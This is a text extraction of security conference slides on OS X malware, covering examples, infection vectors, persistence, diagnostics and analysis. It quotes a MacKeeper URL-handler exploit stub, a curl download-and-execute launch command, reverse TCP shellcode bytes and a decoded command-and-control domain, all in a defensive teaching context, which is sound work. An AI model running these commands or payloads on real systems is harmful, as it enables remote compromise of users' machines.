    OS X/BACKDOOR(?) bot/backdoor thatexploits MacKeeper <script> window.location.href = 'com-zeobit-command:///i/ZBAppController/performActionWithHelperTask: arguments:/<BASE_64_ENCODED_STUB>'; ... "[a] flaw in MacKeeper's URL handler implementa1on allows arbitrary remote code execu1on when a user visits a specially cra]ed webpage" -bae systems exploit & payload launch agent curl -A 'Safari' -o /Users/Shared/dufh http://<redacted>/123/test/qapucin/bieber/210410/cormac.mcr; chmod 755 /Users/Shared/dufh; cd /Users/Shared; ./dufh shell download executesurvey
  • 12.
    OS X/CARETO ('MASK') ‘cyber-espionagebackdoor' launch agent [~/Library/LaunchAgents/ com.apple.launchport.plist] lea rdi, encodedServer ; "x16dn~x1AcM!"... mov rsi, decodedServer call __Dcd ... mov rdi, decodedServer mov esi, cs:_port call _sbd_connect $ lldb OSX_Careto (lldb) target create "OSX_Careto" Current executable set to 'OSX_Careto' (x86_64).'' 
 (lldb) b _Dcd Breakpoint 1: where = OSX_Careto`_Dcd,
 ... $ (lldb) x/s decodedServer 0x100102b40: "itunes212.appleupdt.com" disassembly debugging (decoding C&C) encoded strings phishing/exploits
  • 13.
    PART 0X2: VIROLOGY studyof os x malware characterisdcs & commonalides
  • 14.
    INFECTION VECTORS method 0x1:via user-interacdon fake codecs fake installers/updates infected torrents rogue "AV" products ??? poor naive users
  • 15.
    INFECTION VECTORS method 0x2:exploits "interested in buying zero-day vulnerabili1es with RCE exploits for the latest versions of ...Safari? ...exploits allow to embed and remote execute custom payloads and demonstrate modern [exploita1on] techniques on OS X" 
 -V. Toropov (email to hackingteam) how the real hackers do it } ;OSX x64 reverse tcp shell (131 bytes, shell-storm.org) ;"x41xB0x02x49xC1xE0x18x49x83xC8x61x4Cx89xC0x48" + ;"x31xD2x48x89xD6x48xFFxC6x48x89xF7x48xFFxC7x0F" + ;"x05x49x89xC4x49xBDx01x01x11x5CxFFxFFxFFxFFx41" + ;"xB1xFFx4Dx29xCDx41x55x49x89xE5x49xFFxC0x4Cx89" + ;"xC0x4Cx89xE7x4Cx89xEEx48x83xC2x10x0Fx05x49x83" + ;"xE8x08x48x31xF6x4Cx89xC0x4Cx89xE7x0Fx05x48x83" + ;"xFEx02x48xFFxC6x76xEFx49x83xE8x1Fx4Cx89xC0x48" + ;"x31xD2x49xBDxFFx2Fx62x69x6Ex2Fx73x68x49xC1xED" + ;"x08x41x55x48x89xE7x48x31xF6x0Fx05"
  • 16.
    PERSISTENCE many opdons, fewused launchdaemons&agents userloginitems browserextensions&plugins [RSA2015]
 "Malware Persistence on OS X" ~20 techniques
  • 17.
    FEATURES dependent on thegoals of the malware [ criminal ] [ espionage ] shell video audio ads clicks money keylogs surveys downloads exec's
  • 18.
    SUMMARY the current stateof OS X malware persistence psp bypassself-defense features ‣ well known methods ‣ majority: launch items ‣ minimal obfusca9on ‣ trivial to detect/remove ‣ poorly implemented ‣ suffice for the job ‣ occasional an9-AV ‣ no psp detec9on stealth ‣ 'hide' in plain site ‣ rootkits? not common infec9on ‣ trojans/phishing ‣ some exploits
  • 19.
    PART 0X3: DIAGNOSTICS areyou possibly infected?
  • 20.
    VISUALLY OBSERVABLE INDICATORS moreoken than not, you're not infected... unlikelymalware possiblymalware "mycomputeris soslow" "itkeepscrashing" ADs "somanyprocesses" "therearetonsofpopups" "mycomputersaysitsinfected" "myhomepageandsearch engineareweird" most not trivially observable!
  • 21.
    VISUALLY OBSERVABLE INDICATORS genericalerts may indicate the presence of malware persistence(BlockBlock) networkaccess(LittleSnitch) note:suchtoolsdonotattempttodirectlydetectmalwareper-se…
  • 22.
    STEP 0X1: KNOWNMALWARE any known malware running on your system? VT ratios
  • 23.
    STEP 0X2: SUSPICIOUSPROCESSES any unrecognized binaries running on your system? unsignedtasks “globalsearch”for: 3rd-partytasks unsigned "apple" unrecognized(byVT) suspicious! + +
  • 24.
    STEP 0X3: SUSPICIOUSPERSISTENCE any unrecognized binaries persisdng on your system? KnockKnock;enum.persistence unsigned "apple" suspicious! suspiciousitem unrecognized(byVT) + +
  • 25.
    STEP 0X4: NETWORKI/O odd ports or unrecognized connecdons? # sudo lsof -i | grep ESTABLISHED apsd 75 root TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED) apsd 75 root TCP 172.16.44.128:49508->17.143.164.32:5223 (ESTABLISHED) JavaW 1184 root TCP 172.16.44.128:49532->188.167.254.92:51667 (ESTABLISHED) iWorm('JavaW')listeningforattackerconnection or 'established' for connected sessions iWormconnectedtoc&cserver
  • 26.
    STEP 0X5: SUSPICIOUSKEXTS, HIJACKED DYLIBS, ETC. countless other things to look for.... uncheck ‘'Show OS Kexts' anysuspiciouskernelextensions? hijackeddylibs? [DefCon 2015] "DLL Hijacking on OS X? #@%& Yeah!"
  • 27.
    PART 0X4: ANALYSIS determineif something is malicious....or not!?
  • 28.
    CODE-SIGNING examine the binary’scode signature $ codesign -dvv /usr/lib/libtidy.A.dylib 
 Format=Mach-O universal (i386 x86_64)
 Authority=Software Signing Authority=Apple Code Signing Certification Authority Authority=Apple Root CA libtidy is signed by apple proper codesign -dvv OSX_Careto 
 OSX_Careto: code object is not signed at all most malware; unsigned signed by apple: not malware! libtidy dylib flagged by VT usecodesigntodisplaya binary’ssigninginfo ex:$ codesign -dvv <file>
  • 29.
    GOOGLE THE HASH may(quickly) tell you; known good || known bad $ md5 appleUpdater MD5 (appleUpdater) = 2b30e1f13a648cc40c1abb1148cf5088 unknown hash ….might be odd ‣ 3rd-partybinaries,mayproduce zerohitsongoogle ‣ 0%detectiononvirustotaldoesn’t mean100%notmalware known hash (OSX/Careto)
  • 30.
    STRINGS quickly triage abinary’s funcdonality $ strings -a OSX_Careto
 reverse lookup of %s failed: %s bind(): %s connecting to %s (%s) [%s] on port %u executing: %s
 cM!M> `W9_c [0;32m strings;osx/careto networking& execlogic encodedstrings $ strings -a JavaW 
 $Info: This file is packed with the UPX executable packer $Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. strings; iWorm usewiththe-aflag packed(UPX) googleinterestingstrings
  • 31.
    FILE ATTRIBUTES OS Xnadvely support encrypted binaries ourhardworkbythese wordsguardedplease dontsteal(c)AppleC encrypted with Blowfish disassembling Finder.app encryp9ng the malware $ strings -a myMalware infectUser: ALOHA NULLCON! $ ./protect myMalware encrypted 'myMalware' $ strings -a myMalware 
 n^jd[P5{Q r_`EYFaJq07 known malware: ~50% drop VT detection
  • 32.
    FILE ATTRIBUTES detecdng encryptedbinaries //check all load commands for(int i = 0; i<[machoHeader[LOAD_CMDS] count]; i++) { //grab load command loadCommand = [machoHeader[LOAD_CMDS] pointerAtIndex:i];
 //check text segment if(0 == strncmp(loadCommand->segname, SEG_TEXT, sizeof(loadCommand->segname)) { //check if segment is protected if(SG_PROTECTED_VERSION_1 == (loadCommand->flags & SG_PROTECTED_VERSION_1)) { //FILE IS ENCRYPTED detec9ng encryp9on TaskExplorer }unsigned encrypted +
  • 33.
    FILE ATTRIBUTES malware isoken packed to 'hinder' detecdon/analysis $ strings -a JavaW
 
 Info: This file is packed with the UPX executable packer http://upx.sf.net Id: UPX 3.09 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved. iWorm(JavaW);packed //count all occurrences for(NSUInteger i = 0; i < length; i++) occurrences[0xFF & (int)data[i]]++; //calc entropy for(NSUInteger i = 0; 
 i < sizeof(occurrences)/sizeof(occurrences[0]); i++) { //add occurrences to entropy if(0 != occurrences[i]) { //calc ratio pX = occurrences[i]/(float)length; //cumulative entropy entropy -= pX*log2(pX); } TaskExplorer genericpackerdetectionalgorithm viewallpackedtasks/dylibs
  • 34.
    CLASSDUMP extract class names,methods, & more... $ class-dump RCSMac.app
 
 @interface __m_MCore : NSObject { NSString *mBinaryName; NSString *mSpoofedName; } - (BOOL)getRootThroughSLI;
 - (BOOL)isCrisisHookApp:(id)arg1;
 - (BOOL)makeBackdoorResident; - (void)renameBackdoorAndRelaunch;
 @end rcsmac(osx/crisis) $ class-dump Installer.app
 
 @interface ICDownloader : 
 NSObject <NSURLConnectionDelegate> { NSURL *_URL; NSString *_destPath; long long _httpStatusCode; NSString *_suggestedName; } - (void)startDownloading; @interface NSURL (ICEncryptedFileURLProtocol) + (id)fileURLWithURL:(id)arg1; + (id)encryptedFileURLWithURL:(id)arg1; @end adwareinstaller(InstallCore) http://stevenygard.com/projects/class-dump/
  • 35.
    DYNAMIC FILE I/O quicklydetermine binaries file-related acdons # fs_usage -w -f filesystem
 open /Users/user/Library/LaunchAgents/com.apple.updater.plist write F=2 B=0x4a 
 
 
 open F=5 /Users/Shared/dufh chmod <rwxr-xr-x> /Users/Shared/dufh 
 unlink ./mackeeperExploiter filei/o(mackeeperexploiter) $ man fs_usage FS_USAGE(1) BSD General Commands Manual fs_usage -- report system calls and page faults related to filesystem activity in real-time fs_usagemanpage persistenceaslaunchagent (com.apple.updater.plist) installation(/Users/ Shared/dufh) selfdeletion,cleanup
  • 36.
    NETWORK I/O gain insightinto the binary's network communicadons osx/caretoinwireshark note: C&C is (now) offline odddnsqueries periodicbeacons (custom)encryptedtraffic "itunes212.appleupdt.com"
  • 37.
    VIRUSTOTAL SANDBOX file i/o+ network i/o, and more! virustotalportal filei/o networki/o "VirusTotal+=MacOSXexecution"
 
 blog.virustotal.com/2015/11/ virustotal-mac-os-x-execution.html
  • 38.
    REVERSING OBJECTIVE-C understand afew basic concepts connectedToInternet(void) proc near mov rdi, cs:_OBJC_CLASS_$_NSURL mov rsi, cs:URLWithString ; "URLWithString:" lea rdx, cfstr_google ; "www.google.com" mov rax, cs:_objc_msgSend_ptr call rax ; objc_msgSend ... internetcheck(mackeeperexploiter) arg name (for) objc_msgSend 0 RDI class 1 RSI method name 2 RDX 1st argument 3 RCX 2nd argument 4 R8 3rd argument 5 R9 4th argument objc_msgSendfunction callingconvention(systemvamd64abi)
  • 39.
    DECOMPILATION there’s an appfor that! int connectedToInternet() { rax = [NSURL URLWithString:@"http://www.google.com"]; rdx = rax; var_38 = [NSData dataWithContentsOfURL:rdx]; if(var_38 != 0x0) { var_1 = 0x1; } else { var_1 = 0x0; } rax = var_1 & 0x1 & 0xff; return rax; } decompilation;internetcheck(mackeeperexploiter) connectedToInternet(void) proc near mov rdi, cs:_OBJC_CLASS_$_NSURL mov rsi, cs:URLWithString_ lea rdx, cfstr_google ; "www.google.com" mov rax, cs:_objc_msgSend_ptr call rax ... hopper.app
 http://www.hopperapp.com
  • 40.
    DEBUGGING using lldb; osx’s debugger command description example r launch (run) the process b breakpoint on function b system br s -a <addr> breakpoint on a memory add br s -a 0x10001337 si/ni step into/step over po print objective-C object po $rax reg read print all registers $ lldb newMalware (lldb) target create "/Users/patrick/malware/newMalware" Current executable set to '/Users/patrick/malware/newMalware' (x86_64). beginningadebuggingsession see:"Gdb to LLDB Command Map" commonlldbcommands
  • 41.
    PART 0X5: HEALTH& HAPPINESS how do i protect my personal macs?
  • 42.
    APPLE'S OS XSECURITY MITIGATIONS? gatekeeper, xprotect, SIP, code-signing, et al... "Security & privacy are fundamental to the design of all our hardware, so]ware, and services" -9m cook ‣ "Gatekeeper Exposed"
 (Shmoocon) ‣ "OS X El Capitan-Sinking the S/hIP" ‣ "Memory Corruption is for Wussies!" (SysScan) ‣ "Writing Bad@ss OS X Malware" 
 (Blackhat) ‣ "Attacking the XNU Kernel in El Capitan" (BlackHat)
  • 43.
    only 4 launchitems no 'java' processes fully patched OS X gatekeeper enabled DEMO(GATEKEEPER BYPASS)
  • 44.
    OS X LOCKDOWN hardensOS X & reduces its aqack surface # ./osxlockdown [PASSED] Enable Auto Update [PASSED] Disable Bluetooth [PASSED] Disable infrared receiver [PASSED] Disable AirDrop ...
 
 osxlockdown 0.9 Final Score 86%; Pass rate: 26/30
 osxlockdown
 S.Piper(@0xdabbad00) github.com/SummitRoute/osxlockdown “builttoaudit&remediate,security configurationsettingsonOSX10.11" -S.Piper
  • 45.
    OS X SECURITYTOOL LiqleSnitch Firewall “if[LittleSnitch]isfound,themalware[OSX/DevilRobber.A]willskip installationandproceedtoexecutethecleansoftware”-fSecure.com trivialtobypass securityvulnerabilities? yes, stay tuned! 'snitching
  • 46.
    MY PERSONAL SECURITYTOOLS Objecdve-See, because "sharing is caring" :) "No one is going to provide you a quality service for nothing. 
 If you’re not paying, you’re the product." -fSecure ...as they try to sell things! + I should write some OS X security tools to protect my Mac ....and share 'em freely :)
  • 47.
    SECURITY TOOLS Objecdve-See; freeOS X security tools KnockKnock BlockBlock TaskExplorer Ostiarius Hijack Scanner KextViewr Lockdown specimenstoplaywith!
  • 48.
  • 49.
    CONCLUSIONS & APPLICATION osxmalware (iWorm,Crisis,Genieo,etc.) learnedabout: scan & protect! littlesnitch/firewall patrick@synack.com @patrickwardle genericdetection&analysis
  • 50.
    credits - iconmonstr.com - http://wirdou.com/2012/02/04/is-that-bad-doctor/
 
 
 -thesafemac.com - "Mac OS X & iOS Internals", Jonathan Levin - http://researchcenter.paloaltonetworks.com/2015/09/more-details-on-the-xcodeghost-malware- and-affected-ios-apps/ - http://baesystemsai.blogspot.ch/2015/06/new-mac-os-malware-exploits-mackeeper.html - http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
 images resources